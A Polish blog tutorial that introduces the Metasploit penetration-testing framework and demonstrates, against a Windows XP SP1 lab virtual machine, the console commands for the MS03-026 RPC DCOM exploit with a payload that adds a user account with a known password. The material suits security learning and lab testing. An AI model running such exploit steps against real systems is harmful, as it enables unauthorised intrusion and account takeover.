Strona używa cookies (ciasteczek). Dowiedz się więcej o celu ich używania i zmianach ustawień. Korzystając ze strony wyrażasz zgodę na używanie cookies, zgodnie z aktualnymi ustawieniami przeglądarki.    X

Metasploit- krótkie wprowadzenie

Zapewne nie wszyscy słyszeli co to dokładnie jest więc trochę wstępu. Metasploit jest to narzędzie open source służące do testów penetracyjnych i łamania zabezpieczeń. Posiada imponującą bazę gotowych exploitów (wybaczcie ale będę używał tej nazwy) i posiada interfejs dzięki któremu można przygotować własne na bazie istniejących komponentów. Oczywiście najbardziej praktycznym zastosowaniem Metasploit jest testowanie luk bezpieczeństwa w systemach, choć niektórzy mogą używać go także do niecnych celów takich jak na przykład ataki bruteforce lub DOS.

Exploity dzielimy na aktywne i pasywne.

Aktywne to takie, które działają na hoście, aż do wykonania określonego działania i dopiero wtedy kończą swoja aktywność. Charakteryzują się:

r   e   k   l   a   m   a

  • moduły brute-force zakończą się kiedy zostanie uzyskany dostęp do atakowanego systemu
  • moduły przestają działać kiedy pojawią się błędy
  • można także nakazać modułom działać w tle, używamy do tego parametru „-j” na końcu komendy

Pasywne to takie, które uaktywniają się dopiero wtedy nastąpi połączenie z hostem. Zazwyczaj używane są przy atakach na przeglądarki www, klientów poczty, ftp itd.

Metasploit używamy poprzez konsole i wygląda ona tak:

Poniżej zademonstruje jak utworzyć konto użytkownika przy użyciu exploitu w RPC DCOM w Windows XP.

1. W konsoli wpisujemy „search dcom” aby znalezć interesujący nas exploit. Jak widać na obrazku poniżej mamy kilka do wyboru:

2. Użyję drugiego exploitu na liście.

Wpisujemy w konsole:

use exploit/windows/dcerpc/ms03_026_dcom

następnie „show options” aby zobaczyć co dokładnie możemy zrobić z tym exploitem.

3. Używamy parametru RHOST aby pokazać cel ataku. W moim przypadku to adres wirtualnej maszyny z Windows XP. Wpisujemy komendę:

set RHOST 192.168.1.148

Następnie używamy komendy:

set PAYLOAD

Warto wspomnieć, że jeśli naciśniemy TAB po komendzie otrzymamy pełną listę działań jakie możemy podjąć.

W tym przypadku użyję „windows/adduser”, poprzez pełną komendę:

set PAYLOAD windows/adduser

Jak widać na poniższym obrazku, jeśli użyjemy tego exploita, zostanie utworzone konto o nazwie: Metasploit oraz haśle: Metasploit$1

4. No to do dzieła. Wpisujemy ostatnią komendę:

exploit

Jak widać połączenie zostało nawiązane i została podjęta próba ataku na Windows XP.

A oto wynik:

Oczywiście była to tylko krótka prezentacja możliwości Metasploit. W tym przypadku użyłem exploita z 2003 roku atakując system Windows XP SP1.

Metasploit oferuje o wiele bardziej wyrafinowane metody ataku, takie jak omijanie zabezpieczeń antywirusowych, tworzenie trojanów i wirusów. Przy odpowiedniej wiedzy jest to naprawdę bardzo potężne narzędzie.
 

bezpieczeństwo

Komentarze